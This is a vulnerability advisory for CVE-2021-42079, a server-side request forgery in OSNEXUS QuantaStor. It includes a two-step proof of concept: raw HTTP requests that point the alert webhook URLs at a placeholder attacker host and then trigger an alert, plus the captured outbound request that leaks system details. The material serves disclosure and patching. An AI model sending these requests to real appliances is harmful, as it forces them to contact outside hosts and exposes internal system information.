CVE-2021-42079

An authenticated administrator is able to prepare an alert that is able to execute an SSRF attack. This is exclusively with POST requests.

POC

Step 1: Prepare the SSRF with a request like this:

GET /qstorapi/alertConfigSet?senderEmailAddress=a&smtpServerIpAddress=BURPCOLLABHOST&smtpServerPort=25&smtpUsername=a&smtpPassword=1&smtpAuthType=1&customerSupportEmailAddress=1&poolFreeSpaceWarningThreshold=1&poolFreeSpaceAlertThreshold=1&poolFreeSpaceCriticalAlertThreshold=1&pagerDutyServiceKey=1&slackWebhookUrl=http://<target>&enableAlertTypes&enableAlertTypes=1&disableAlertTypes=1&pauseAlertTypes=1&mattermostWebhookUrl=http://<TARGET>
HTTP/1.1

Host: <HOSTNAME> 
Accept-Encoding: gzip, deflate

Accept: */*
Accept-Language: en

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36

Connection: close

authorization: Basic <BASIC_AUTH_HASH> 
Content-Type: application/json

Content-Length: 0

Step 2: Trigger this alert with this request

GET /qstorapi/alertRaise?title=test&message=test&severity=1 
HTTP/1.1

Host: <HOSTNAME> 
Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36

Connection: close

authorization: Basic <BASIC_AUTH_HASH> 
Content-Type: application/json

Content-Length: 1

The post request received by <TARGET> looks like this:
{

### Python FLASK stuff ####

'endpoint': 'index', 

'method': 'POST', 

'cookies': ImmutableMultiDict([]), 

### END Python FLASK stuff ####


'data': b'{ 
"attachments": [ 
{

"fallback": "[122] test / test.",

"color": "#aa2222",

"title": "[122] test",

"text": "test",

"fields": [  
{  

"title": "Alert Severity",
      
"value": "CRITICAL",
      
"short": false 
}, {  
"title": "Appliance",   
"value": "quantastor (https://<HOSTNAME>)",
    
"short": true 

}, {  

"title": "System / Driver / Kernel Ver",  

"value": "5.10.0.156+a25eaacef / scst-3.5.0-pre / 5.3.0-62-generic",  

"short": false 

}, {  

"title": "System Startup",  

"value": "Fri Aug 6 16-02-55 2021",  

"short": true 

     }, {  

"title": "SSID",  

"value": "f4823762-1dd1-1333-47a0-6238c474a7e7",  

"short": true 

},
],

"footer": "QuantaStor Call-home Alert",

"footer_icon": " https://platform.slack-edge.com/img/default_application_icon.png ",

"ts": 1628461774
}
], 
"mrkdwn":true 
}', 
#### FLASK REQUEST STUFF #####

'headers': {

'Host': '<redacted>', 
'User-Agent': 'curl/7.58.0', 
'Accept': '*/*', 
'Content-Type': 'application/json', 
'Content-Length': '790'

}, 
'args': ImmutableMultiDict([]), 
'form': ImmutableMultiDict([]), 
'remote_addr': '217.103.63.173', 
'path': '/payload/58', 
'whois_ip': 'TNF-AS, NL'
}

#### END FLASK REQUEST STUFF #####
SSRF
ProviderTypeBase ScoreAtk. VectorAtk. ComplexityPriv. RequiredVector
NISTNIST
6.2 MEDIUM
NETWORK
LOW
HIGH
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:N/A:N
DIVDCNA
6.2 MEDIUM
NETWORK
LOW
HIGH
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:N/A:N
CVEADP
---
---
CISA-ADPADP
---
---
Base Score
CVSS 3.x
EPSS Score
Percentile: 16%
VendorProductVersion
osnexusquantastor
𝑥
< 6.0.0.355
𝑥
= Vulnerable software versions
Common Weakness Enumeration
References
https://cisrt.divd.nl/DIVD-2021-00020/
https://csirt.divd.nl/CVE-2021-42079
https://www.osnexus.com/products/software-defined-storage
https://www.wbsec.nl/osnexus
https://csirt.divd.nl/CVE-2021-42079
https://www.divd.nl/DIVD-2021-00020
https://www.osnexus.com/products/software-defined-storage
https://www.wbsec.nl/osnexus